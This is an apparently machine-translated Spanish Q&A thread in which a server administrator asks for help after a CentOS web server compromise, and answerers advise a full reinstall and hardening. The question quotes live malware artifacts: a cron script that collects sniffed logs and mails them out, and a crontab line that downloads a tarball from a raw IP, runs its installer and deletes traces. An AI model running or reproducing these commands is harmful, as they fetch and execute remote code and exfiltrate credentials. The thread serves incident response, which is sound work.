¿Necesita asesoramiento sobre el pirateo del servidor linux?

4

Actualmente estoy tratando de averiguar cómo se comprometió uno de nuestros servidores centos. Estábamos experimentando malware en nuestros sitios. Después de buscar finalmente encontré el malware inyectando en los sitios. Como sucedía al azar, era difícil de detectar. Seguí la ayuda de este artículo del blog:

enlace

Esto me llevó a buscar a través de cada uno de los módulos de apache y, finalmente, encontró un módulo que estaba inyectando el malware. Fue bajo el nombre de mod_string_mime.so y se cargó a través de /etc/httpd/conf.d/mailman.conf para evitar la detección. Muy frustrante. Por lo tanto, el módulo ahora se elimina y el archivo mailman.conf vuelve a la normalidad.

Excavando más, instalé y ejecuté rkhunter. Al ejecutar esto, encontré una advertencia para un archivo sospechoso en /etc/cron.daily/ llamado dnsquery. En este archivo, esto es lo que parece ...

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail [email protected] -s "$(hostname -f)" < test
mail [email protected] -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A

He intentado eliminar este archivo pero sigue regresando cada minuto. El propietario y el grupo es 'psaadm'. No puedo encontrar cómo se está creando. Supongo que se está generando a través de plesk cron o algo así.

También encontré esto en el crontab:

*   *   *   *   *   chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;

que no se ve bien.

¿Alguna sugerencia sobre cómo proceder o localizar la intrusión?

    
pregunta davidbehan 16.02.2013 - 23:14
fuente

2 respuestas

6

Lo primero es lo primero. Su máquina se vio comprometida y se instalaron varias cosas para mantenerla comprometida. Esto no puede ser salvado; La máquina debe ser limpiada con fuego. No podrá evitar un formato completo & reinstalar. Tu sistema está muerto; derramar una lágrima en él, luego seguir adelante.

Ahora, solo estamos hablando de análisis post mortem. El crontab descarga visiblemente cada minuto un paquete (el archivo "skdet.tgz") que luego se descomprime y lanza, y hace algunas ... cosas interesantes. Por ejemplo, automáticamente saquea y envía por correo electrónico su archivo /etc/shadow . Es posible que desee descargar el archivo en otra máquina, descomprimirlo e inspeccionar el contenido (¡ no inicie ningún archivo en él!); es instructivo.

El paquete contiene un "mensaje" en el que el autor del rootkit afirma que no rompió nada y que podría ayudar a eliminar el rootkit si se lo contactara, aunque no habla de ninguna condición. Esta podría ser una experiencia científica genuina que se salió de las manos; Esto también podría ser un caso más mundano de rescate.

    
respondido por el Tom Leek 16.02.2013 - 23:35
fuente
4

Bueno, solo hay una cosa que puedes hacer:

Lomejoresreferirsealapéndicesobreestoen serverfault .

Si está utilizando su servidor web para alojar diferentes sitios web, lo mejor que puede hacer es asegurarse de que cada sitio tenga su propio usuario, que está encarcelado. Esto reducirá el riesgo de que su sistema se vea comprometido. (Es posible que aún existan binarios vulnerables que puedan conducir a una escalada de privilegios, por lo que debe asegurarse de que haya parches en su máquina lo antes posible cuando salgan los parches de seguridad). Por ejemplo, suphp está hecho específicamente para este propósito y ejecuta el código bajo su propietario y no bajo el usuario que está ejecutando su servidor web.

Además, le aconsejo que fortalezca su máquina mediante el uso de firewalls de aplicaciones web y sistemas de detección de intrusos de host. Esto reducirá la cantidad de posibles ataques. (Esto necesita algunos ajustes, ya que podría interferir con los servicios)

    
respondido por el Lucas Kauffman 16.02.2013 - 23:49
fuente

Lea otras preguntas en las etiquetas